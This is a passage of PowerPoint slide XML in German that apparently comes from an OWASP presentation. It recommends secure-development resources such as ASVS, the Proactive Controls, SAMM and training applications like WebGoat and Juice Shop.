                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-, Lab- und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Incubator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Projekte des OWASP Projektinventars bereitstellt. Viele OWASP Ressourcen sind in unserem </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, verfügbar und können auch in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Papierformat oder als </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> bestellt werden.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" noProof="0" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2925080"/>
            <a:ext cx="8763000" cy="5448300"/>
            <a:chOff x="-914400" y="2895600"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2895600"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="2983588"/>
              <a:ext cx="5608321" cy="72775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72000" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Um eine sichere Web Anwendung zu erstellen ist es wichtig vorher zu definieren was "sicher" im Falle einer speziellen Anwendung bedeutet. OWASP empfiehlt dazu den OWASP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hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Application</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t> Security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hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Verification</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t> Standard (ASVS)</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als Leitfaden zur Erstellung von Sicherheitsanforderungen. Bei Outsourcing der Anwendungsentwicklung empfiehlt sich der </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>OWASP Secure Software </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>Contract</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t> Annex</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>deutsch</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>). </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Hinweis: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t>Das Dokument ist ausschließlich als Orientierungshilfe anzusehen, es bezieht sich auf US-Recht. Konsultieren Sie in jedem Fall einen spezialisierten Anwalt, bevor Sie es benutzen</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="9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 name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2932907"/>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900" kern="120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33034" y="3998862"/>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72000" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Anstatt Sicherheit nachträglich in eine Anwendung oder API einzubauen, ist es kosteneffektiver, diese schon beim Design zu beachten. OWASP empfiehlt hierzu die </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>OWASP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hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>Prevention</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t> Cheat Sheets</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als einen guten Startpunkt, um die Anwendung von Anfang an sicher zu konstruieren.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3942369"/>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900" b="1">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33034" y="5018637"/>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2000" rIns="72000" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Die Entwicklung starker und anwendbarer Sicherheitsmaßnahmen ist nicht trivial. Standardisierte Sicherheitsmaßnahmen vereinfachen die Entwicklung sicherer Anwendungen oder APIs. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Proactive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t> Controls</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </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ist ein guter Startpunkt für Entwickler. Viele moderne Frameworks enthalten heute schon standardmäßig effektive Sicherheitsprüfungen für Autorisierung, Validierung, CSRF-Schutz etc.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="4962145"/>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r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Standardi-sierte</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> Sicherheits-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>maßnahmen</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="9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33034" y="6035954"/>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72000" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="just" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Um den Prozess zur sicheren Anwendungserstellung in einer Organisation zu verbessern,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>empfiehlt OWASP das </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>OWASP Software Assurance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hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>Maturity</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t> Model (SAMM)</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Das Modell hilft bei</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="just" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>der Formulierung und Umsetzung einer Software Sicherheitsstrategie, die die spezifischen Risiken</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="just" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ihrer eigenen Organisation berücksichtigt.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5979462"/>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900" b="1" kern="1200" baseline="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33034" y="7053253"/>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72000" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Das </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>OWASP Education Project</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bietet Trainingsunterlagen zur Schulung von Entwicklern im Bereich der Webanwendungssicherheit. Um praxisbezogene Erfahrungen über Schwachstellen zu sammeln empfiehlt die OWASP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hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>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hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>WebGoat</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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>WebGoat.NET</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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>OWASP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hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>NodeJS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>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hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>Goat</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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>OWASP Juice Shop Project</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oder das </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>OWASP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hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>Broken</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t> Web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hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>Applications</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t> Project</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Um aktuell zu bleiben besuchen Sie die </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP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hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>AppSec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t> Conference</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ein OWASP Training oder eines der lokalen </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId20"/>
                </a:rPr>
                <a:t>OWASP Chapter-Meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1000" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6996761"/>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46800" tIns="64946" rIns="46800" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Trainin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>gs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
